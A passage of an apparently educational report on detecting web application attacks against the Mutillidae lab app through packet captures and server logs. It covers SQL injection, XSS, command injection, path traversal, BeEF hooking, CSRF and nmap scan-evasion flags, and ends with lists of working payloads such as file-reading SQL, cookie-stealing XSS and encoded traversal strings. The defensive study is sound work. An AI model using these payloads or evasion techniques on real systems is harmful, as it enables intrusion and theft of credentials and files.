The DELETE method on the other hand is used to remove any resources from the web server. This form of attack can be used to delete configuration files.

The CONNECT method can be used to create an HTTP tunnel for requests. If the attacker knows the resource, he can use this method to connect through a proxy and gain access to unrestricted resources.

3.1.1 Identifying dangerous use of HTTP methods

The OPTIONS method is being used to identify a malicious action against the web server. The incoming traffic is being analyzed to see if the HTTP methods can be identified from each other.
Below result shows that the OPTIONS method has been used and this can be marked as a malicious action against the web server.

172.16.40.133 - - [29/Jul/2012:09:01:10 +0300] ”OPTIONS /mutillidae/ HTTP/1.1” 200 25591

                        Above: Apache log markup for OPTIONS method

When looking at the wireshark and tcpdump output we can see that the OPTIONS method has its unique hexadecimal value that can be used to blacklist any dangerous use of HTTP methods. In addition to the hexadecimal value, when looking at the offset position we can see that the method is located at the 0x0040.




by checking all the HTTP methods, it is possible to separate each methods unique hexadecimal value.


3.2 User-Agent

RFC 2616 defines the web client as a ”user-agent”. When the client is requesting a web page, it is sending information about itself in a header named ”User-Agent”. This information typically identifies the browser, host operating system and language. Even though the user-agent is set correctly by default, it can be spoofed by the user.  This makes it possible for example an attacker to retrieve web content designed for other browser types or even for other devices.


Also many different applications sends information within the user-agent header thus identifying for example malicious intentions. As the header information is completely controlled by the user, it makes it trivial for an attacker to fiddle with the information.

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11

                              Above:  Example of a User-Agent header

Mozilla/5.0 signifies that the browser is compliant with the standards set by Netscape. Next is showed what kind of operating system the browser is running, which in this case is a Ubuntu 9.04 32-bit. Last string tells what version of Firefox is the client using.

Below we can see a tampered User-Agent header. This is just a basic way to spoof it. For example nmap offers a script to remove the string from the header. SQLmap has a option before starting an attack where the user-agent can be hidden. There’s also a complete list of user agent strings offered by User Agent String.com


Also a Firefox add-on called Tamper Data is great for spoofing data in input fields and header information. Figre 11 shows a picture of Tamper Data and all the different options to choose to insert into User-Agent header. It offers also options to inject SQL and XSS.



3.3 Cookies

Cookies are a key part of the HTTP protocol. Cookies enables the web server to send data to the client, which the client stores and resubmits to the server. Unlike the other request parameters, cookies are sent continuously in each subsequent request back to the server.

Cookies are also used to transmit a lot of sensitive data in web applications, mostly they are used to identify the user and remember the session state. The client cannot modify the cookie values directly, but with an interception proxy tool(Burp Suite,Fiddler) it makes it a trivial effort. 

The following example shows how modifying the cookie information it gives the attacker access as someone else. In Figure 11, the attacker provides admin credentials in the login form.


Below pic shows that the login was successful and the cookie header and what values the admin user has in the site. For the admin user a uid value of 1 has been selected to identify the user and a PHPSESSID to remember the session state.


Now, the attacker changes the uid value to 2 and also the PHPSESSID to ”evil”. This way the attacker can see if he can get an access to the application as someone else and proof that the application is vulnerable to session state attacks.


Below pic shows, the application is indeed vulnerable and does not perform any checks and trusts the client completely. The attacker managed to get access to the application by another admin user, named adrian.


4. Bruteforce

Many web applications employ a login functionality, which presents a good opportunity for an attacker to exploit the login mechanism. The basic idea is that an attacker tries to guess usernames and passwords and thus gain unauthorized access to the application.  Mostly brute-force attacks are done by using an automated tool with custom wordlists.

In below pic we can see what parameters are passed to the login.php, username and password. The following credentials will be used to create a brute-force attack with Burp Suite Intruder. 
admin - password 
admin - root 
admin - admin 
admin - qwerty


4.1 Identifying Bruteforce

We can see from the wireshark and tcpdump2 results that five POST requests was made in under 0.5 seconds to the login.php. This shows that some sort of automated tool has been used to make repeated login attempts against the application.


Also Burp Suite seems to change the port incrementally with each POST request as seen in the tcpdump output.


5. Spidering

When targeting an application it is important to know the structure of the application. This can be done through manual browsing or using an automated tool. Manual browsing can be very time consuming; it is necessary to walk through the application starting from the main initial page, following every link, and navigating through all functions, like registration and login. Some applications may have also a site map, which can help to enumerate the content.

5.1 Robots.txt

Many web servers also contain a file named robots.txt in the web root. It contains a list of files and directories that the site does not want web spiders to visit or search engines to index. In some cases it is possible to find sensitive information or functionality. In this example the attacker has requested the robots.txt file and found a directory called passwords, which contains all the usernames and passwords to the application.



5.2 Identifying Spidering

For comprehensive results about the application it is almost necessary to use an automated, more advanced technique. Downside for this technique is that it is more rigorous and identifiable. Some applications just requests many web pages in a short period of time. 

As seen in the wireshark and tcpdump outputs and apache access log records, there’s over 10 different requests made under 1 second from the same address. This would be impossible to do with manual browsing. Also when using an automated tool the source port is changing incrementally. 



Other point of interest we can see especially from the tcpdump output is that every request originates from a different port. Also we can see that the port numbers are growing incrementally and they are not in any random order. The apache access log also shows a lot of requests that have received a ”404 Not Found” response. The automated tool seems to use some sort of wordlist to request most common directories from the web site.




6 Injection flaws

Most common are SQL injection, command injection and cross site scripting. In this type of flaws the attacker is able to inject content that the application uses. Basically the application is trusting the client and accepts its content without filtering or these filters can be bypassed.

6.1 SQL Injection

SQL injection vulnerabilities allows an attacker to control what query is run by the application. To successfully exploit a SQL injection vulnerability the attacker needs to have an understanding of SQL and database structures. It is possible for an attacker to create users, modify transactions, change records or even port scan the internal network and much more. Basically the possibilities are limitless.

For discovering SQL injection flaws any data related input that appears to be used in database interaction is the attack surface. One of the easiest way is just to introduce a common SQL delimiter, such as the single quote ’. If the application breaks or produces a error message or page then it is most likely vulnerable to SQL injection.

6.1.1 Identifying SQL Injection

The following input anything’ OR ’x’=’x is passed to exploit a SQL injection vulnerability in the mutillidae login form. 
As the request was first captured with an interception proxy tool and then malicious input was introduced to mutillidae, we can see that it has not decoded the characters. Below  we can see the username and password parameters that SQL injection exploit has been used.




There is not any other anomalies within the request. Only malicious data that has been sent to the target is within the POST body data.

We can see that the attack was successful since the attacker was redirected straight to index.php instead of login.php, also the cookie information shows that the attacker gained unauthorized access as an admin user.

Check for more SQL injection attack patterns and identify other kind of attacks, like numeral SQL injection and data modification. The attacks described provides only a small amount of possibilities that can be used to exploit this vulnerability.



6.1.2 Reading files with SQL injection

This section will demonstrate how to read files through SQL injection. The query will 
use the UNION statement and the load_file() function.

The attacker inputs the following code:
                  ’ union select null,LOAD_FILE(’../../../../../etc/passwd’),null,null,null --

Below pic shows that the mutillidae has decoded the ascii characters but still the attack was successful,




6.2 Cross Site Scripting

Cross Site Scripting (XSS) is also referred to as ”script injection”. It means that an attacker has the ability to inject malicious scripts into to the application and have a browser run it. There are two types of XSS; stored and reflective.

XSS vulnerabilities can be exploited multiple ways. Most typical attacks are for example reading cookies or redirecting a user into malicious site. Also modifying the content on a page, which gives an opportunity for the attacker to run any kind of custom code within the JavaScript language.

Discovering XSS vulnerabilities can be quite simple, using only a browser and injecting JavaScript into various input fields in the application. The simplest method is to just input the following code into any input field <script>alert(xss)</script> and see if the application will run the code.

6.2.1 Identifying XSS

The XSS vulnerability will be exploited in the add-to-your-blog.php section. The following code will be injected through TamperData to demonstrate this vulnerability.

                                           <script>alert(‘hello’);</script> 


When looking at the wireshark result from the XSS exploit we can see the same thing as already seen in the SQL injection section. Mutillidae does not provide any kind of encoding or filtering and in this case the exploit is easily recognized. All malicious data is within the POST body.



It is also possible that when performing a XSS attack the script tags will get decoded from ascii to hexadecimal format. If this is the case there are already software available, such as Suricata and Snort that are able to detect and transcode these characters. Below are cheat sheet for different kinds of XSS attacks.




6.3 Command Injection

Command injection is not as common in web applications as SQL injection. Unlike SQL injection where the attackers’ goal is to retrieve information from the backend database. In command injection the attacker inputs operating system commands through the web application. This type of attack can be very powerful if the application is vulnerable and especially then if the commands can be run with root privileges.

6.3.1 Identifying Command Injection

 Below  shows a basic and successful command injection attack where the target’s server password file is being requested. The following code was injected into the input field: 
      
                             172.16.40.132 & cat /etc/passwd


The wireshark output shows that the slash marks have been decoded from ascii to hexadecimal format producing the following output: 

                               172.16.40.132+cat+%2Fetc%2Fpasswd


The tcpdump output shows the same result as already seen with SQL injection and XSS, that all malicious content with injection flaws can be identified within the POST body data. If the request would have been made with a GET request then the arbitrary input would be located in the URL and apache access logs could also be used to verify the results.



7 Path Traversal

Path traversal vulnerabilities can be found when the application allows user-controllable data to interact with the filesystem. This allows the attacker to create arbitrary input and if the input is not properly sanitized the attacker can retrieve sensitive information from the server.

7.1 Identifying Path Traversal

The path traversal vulnerability will be exploited in the mutillidae text-file-viewer.php functionality. The attack is used to go up in the directories and retrieve the server’s user file. The attacker will request a file from the filesystem and inject the following value into the textfile parameter:                                                                 
                                               ../../../../../../etc/passwd

Below we can see that the attack was successful and the attacker was able to retrieve the user file from the server. There are number of other techniques to exploit this vulnerability.



Looking at the wireshark result from the path traversal exploit we can see that the mutillidae does not provide any kind of filtering or sanitation to the user-supplied input and by this the application is vulnerable and easy to identify.


If the applications input filter does not accept the regular path traversal sequences, it is also possible to URL-encode the slashes and dots. As we already saw from the command injection where the application has URL encoded the characters, it is still vulnerable and the attacker successfully exploited the application.



8 Double Encoding

If the application implements security checks for user input and rejects malicious code injection, it is still possible to bypass the filters with techniques like single and double encoding. There are common character sets that are used in web application attacks; path traversal uses the “../” and XSS uses the “<“ , “/” and “>” characters.

There are some common characters that are used in different injection attacks. As already seen in the command injection attack some of the characters were represented with the % symbol. When it is encoded again, its representation in hexadecimal code is %25. Below table  illustrates the possibilities for hexadecimal encoding and double encoding.


If the application refuses attacks like , with double-encoding the security check might be possible to bypass. The wireshark and tcpdump output shows an example string of what to look for in a malicious double encoded injection attack.



The table above shows the specific characters that should be checked in single or double encode attacks. As these are the most common character sets that are used to attack the application it is possible to reduce the risk of being exploited.

9 BeEF

The Browser Exploitation Framework is a penetration testing tool that focuses on the web browser. BeEF allows the attacker to focus on the payloads instead of how to get the attack to the client.The attacker can hook one or more web browsers and use them as targets to launch different exploits against them. BeEF allows for example port scanning, JavaScript injection, different browser exploits, clipboard stealing et cetera.

9.1 Identifying BeEF 

In the following example the mutillidae machine will be hooked with BeEF. The attacker injected the following code in add-to-yourblog.php section. When the user views the blog entries on the mutillidae site, its browser will become a zombie and the attacker has complete control over it.


Below we can see what kind of traffic has resulted from the point where the victim became a zombie and was exploited.


It shows us that when the victim is hooked, its browser sends a GET request to the BeEF controller every five seconds. The number 8 packet shows the exploitation itself. Every BeEF attack has its own variable, called result_id, which changes every time an attack is conducted. After successful attack the zombie sends a return.php instead of command.php to the BeEF controller. After this it starts again to maintain the connection to the controller. Also the BeEF controller sets its own cookie to the client, called BeEFSession.

10 Unvalidated Redirects and Forwards

In an unvalidated redirect attack the application allows redirecting or forwarding its users to a third-party site or another site within the application. In this case the attacker links to unvalidated redirect and tricks the applications victims into clicking it. Since the forged URL looks like a valid site the victim is more likely to click it and sent into a malicious site.

10.1 Identifying Unvalidated Redirects and Forwards

In the following example Mutillidae offers a list of sites for its users to visit. When clicking a site in the list it takes a single parameter named forwardurl. In this case the attacker crafts a malicious URL that redirects users to a malicious site that can perform, for example phishing or installing malware.

Below pic shows us that the attacker has crafted a malicious URL and links its victims into www.evil.com. Mutillidae does not perform any validation for the input and any kind of destination can be used. For example, the attacker could redirect its victim into a site that has a BeEF hook already placed and hook the victim and take control over its browser.



11 Cross Site Request Forgery 

Cross-Site Request Forgery (CSRF) is similar to XSS. The difference is that it does not require to inject malicious scripts into the web application. Instead an attacker can create a malicious web site, which holds a malicious script that will do actions behalf the targeted user. For CSRF attack to work it needs a targeted user with an active session and predictable transaction parameters. The attacker creates the script to the web site and if the targeted user opens the page while logged into the application, then the script will execute with his privileges and arbitrary actions will be carried out.

11.1 Identifying CSRF 

CSRF vulnerabilities are harder to detect than XSS. It follows a four step process by first reviewing the application logic and finding functions that perform sensitive actions and have predictable parameters. If these are found in the application then the next step is to create a page with the request and have a victim to access this page while logged in to the application.

In the following example the attacker has created a CSRF attack against the users in Mutillidae. Below fig shows that the attacker has injected the following script into the application.



It creates a blog post with a string ”Cross-site request forgery”. The onmouseover variable is for when the victim moves the pointer top of the CSRF blog post it creates a new post without the victim knowing about it. Only thing the victim’s browser will do is refresh the page. 

Other interesting values are also stored in the hidden form fields. We can see that a csrf-token parameter is given with a value ”106424”. This is for blocking this kind of attack. The value of the form field is changed into ”best-guess”, to see if the server processes the request. 

When the victim browses into the blog section and moves its mouse over to the ”Cross-site request forgery” post a new post was made and no other checks were made to the csrf-token.


In this case there was a way to block the possible CSRF vulnerabilities, but it was not efficient enough since no validation for the token value was not made. Using hidden form fields makes the application trust the client completely, which should be never done.

Nmap

There are few anomalies we can separate to identify that this is actually a port scan that has been made. First we look at the timestamps of each TCP request. It shows us that under 0.1 seconds, 10 TCP SYN requests has been made. Nmap also seems to change the source port in every request against the target. If one of the ports are open in the target machine a packet with RST and ACK flags is sent and the connection to the port is closed immediately. It also shows that a typical packet size from nmap seems to be 74 bytes.


In this case it shows that at least ftp(21), http(80), https(443) and mysql(3306) ports are open. 

Source port number specification

Below the attacker has used the following: nmap --source-port 53 172.16.40.132


Here the packet size is 60 and and if a port is open in the target the connection will be closed by sending a packet with RST flag.

Cloak a scan with decoys

Nmap has also a technique that allows the attacker to specify a number of hosts that are scanning the host. The IDS will show all the decoy addresses and the attackers ip address doing port scan, but they won’t know which IP was scanning them and which were innocen decoys. According to nmap it is an effective technique for hiding own IP address while port scanning.

nmap -D 192.168.1.10,172.45.24.164,172.16.40.134 -p21,80-100,443,3306 172.16.40.132

In this case we can see the three decoy addresses and the attackers ip address (172.16.40.133). The results are similar to the previous scans except in this case we can see that only the attacker’s ip address has received the RST and ACK flags and thus reveals where the scan originates.



Fragment packets

It is also possible to use tiny fragmented IP packets. Nmap splits up the TCP header over several packets to make it harder to detect by IDS’ or firewalls. There are two options in nmap; using the -f option, which splits the packet up to 8-bytes, or using --mtu when the offset must be a multiple of eight (8,16,24,32 etc).

The results shows that nmap is fragmenting the packets and the target host is responding with RST flag if the port is open. The differences we can see between these two is the fragmented packet size.

Below result shows that the nmap is sending packets 8-bytes size with the following command:
nmap -f 172.16.40.132



Also we can see the user-specified fragmentation which was done with: 
nmap --mtu 16 172.16.40.132


Sending bad checksums

By sending packets to the target with bad checksum may reveal additional information about the server if it’s not properly configured. This technique is also used to avoid firewall. We can see that all the SYN packets has a bad checksum value and the target is not reporting any open ports to the attacker. The scan can be made with command: nmap --badsum 172.16.40.132



Append random data

Firewalls are usually configured to inspect packets by looking at their size in order to identify a possible port scan. As most scanners are sending packets that have specific size. Nmap offers a technique to avoid this kind of detection. With --data-length it is possible to add additional data and sending packets with different size than the default. In below fig the attacker has changed the packet size by adding 25 more bytes. This would tell us that the actual packet size that nmap sends is instead 58 bytes and not 74 bytes.



Using timerate

As there are a lot of options, from timestamps, ip source addresses and packet sizes to identify and block port scanning all of these can be somehow bypass. If the IDS or firewall just checks the timestamp ratio of each request the attacker can use the following nmap command:

nmap --max-rate 1 172.16.40.132

This creates a small, one second, time interval for each scan request. This is also a good technique to be more stealthy as the scan requests can be separated even with minutes. Downside of this technique is that it can take very long time to complete.



Xmas scan

It is called a xmas tree scan since the FIN, PSH and URG packet flags are set. As of this the packet has so many flags turned on that it is often described as being ”lit up like a Christmas tree.” The xmas scan differs from a normal port scan as it does not have the SYN nor ACK flag set.

when scanning the target with xmas scan we can see that when the port is closed it responses with RST and ACK flags. Furthermore, if some of the ports are open and it is targeted with a xmas scan the packet is ignored. Here we can see that at least the mysql, ftp and http ports are open or filtered.


The most common web application security weaknesses are usually the failure to validate user input, implement proper access control and authentication mechanisms. Implementing effective security controls for a web application mitigates the risk being exploited and protects the confidentiality of its users.

The results show that malicious activity can be identified and even blocked. Possible security control mechanisms could be IP address blocking and if possible, limit the amount of requests made to the application in a specific time interval. Also rule based data validation can be made to prevent injection flaws. As the attack patterns show, the attacks can be identified from each other by analysing log files and network traffic monitor information.

The attack vectors described here covers only some basic approaches. It would be impossible to revise all different attack patterns that can be used against web applications.

Here are described some other common attack patterns that are used in injection attacks, which can be used to identify if the application is being targeted by malicious user,

SQL Injection

1 OR 1=1
’ OR 1=1 --
” OR 1=1 --’
OR 1=1;
1 AND 1=1
x’ OR ’1’=’1
‘ OR 1 in (@@version)--
‘ UNION (select @@version) --
1 OR sleep(___TIME___)#
’ OR sleep(___TIME___)#
” OR sleep(___TIME___)#
1 or benchmark(10000000,MD5(1))#
’ or benchmark(10000000,MD5(1))#
” or benchmark(10000000,MD5(1))#
;waitfor delay '0:0:__TIME__'--
);waitfor delay '0:0:__TIME__'--
';waitfor delay '0:0:__TIME__'--
";waitfor delay '0:0:__TIME__'--
OR 1=1 ORDER BY table_name DESC
x’; UPDATE table SET value WHERE user=’x
1’; INSERT INTO table VALUES(‘value’,‘value’);--
101 AND (SELECT ASCII(SUBSTR(name,1,1)) FROM table WHERE foo=n)$ --
’ union select null,LOAD_FILE(’../../../../../etc/passwd’),null,null,null --


  Cross-Site Scripting

 "><script>alert(document.cookie)</script>
aaaa”><script>alert(1)</script>
<script>prompt(’1’)</script>
‘><script>alert(document.cookie)</script>
<script>alert(‘xss’);</script>
<scr<script>ipt>alert(xss)</scr</script>ipt>
<script><script>alert(1)</script>
<script language=”javascript”>window.location.href = ”beeftrap.html” ; </script>
<script src=”http://beefhook.js”></script> 
<ScRiPt>alert(1)</ScRiPt>
<script>alert(1)</script>
<img onerror=alert(1) src=a>

Path Traversal

etc/passwd
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../boot/grub/grub.conf
../../../../../var/log
../../../../../etc/apache2/httpd.conf
..\..\..\../c/boot.ini
..\../..\../boot.ini
../../../../../../etc/shadow&=%3C%3C%3C%3C%3C
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%5c..%5c..%5c..%5c..%5c..%5cc/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd


References
  
BeEF Project. (2012) What is BeEF? Retrieved from: http://beefproject.com/

Deuble, A. (2012) Detecting and Preventing Web Application Attacks with Security
Onion. Retrieved from:

Fielding, R., Gettys, J., Mogul, J., Frystyk, H., Masinter, L., Leach, P. & Berners-Lee, T.
(1999) RFC 2616. Hypertext Transfer Protocol -- HTTP/1.1. Retrieved from: http://tools.ietf.org/html/rfc2616

Gourley, D., Totty, B., Sayer, M., Reddy, S. & Aggarwal, A. (2002) HTTP The
Definitive Guide. O’Reilly. California.

Museong, K. (2011) Penetration Testing Of A Web Application Using Dangerous HTTP

Stuttard, D. & Pinto, M. (2011) The Web Application Hacker’s Handbook. Finding and
Exploiting Security Flaws. Second Edition. Wiley. Indianapolis.

SANS Institute. (2010) Web App Penetration Testing and Ethical Hacking Courseware.

TCPDUMP manual. (2009) Retrieved from: http://www.tcpdump.org/tcpdump_man.html

The OWASP Foundation. (2009) Double Encoding. Retrieved from: https://www.owasp.org/index.php/Double_Encoding

The OWASP Foundation. (2010) OWASP Top Ten Project.


http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf

https://en.wikipedia.org/wiki/List_of_HTTP_header_fields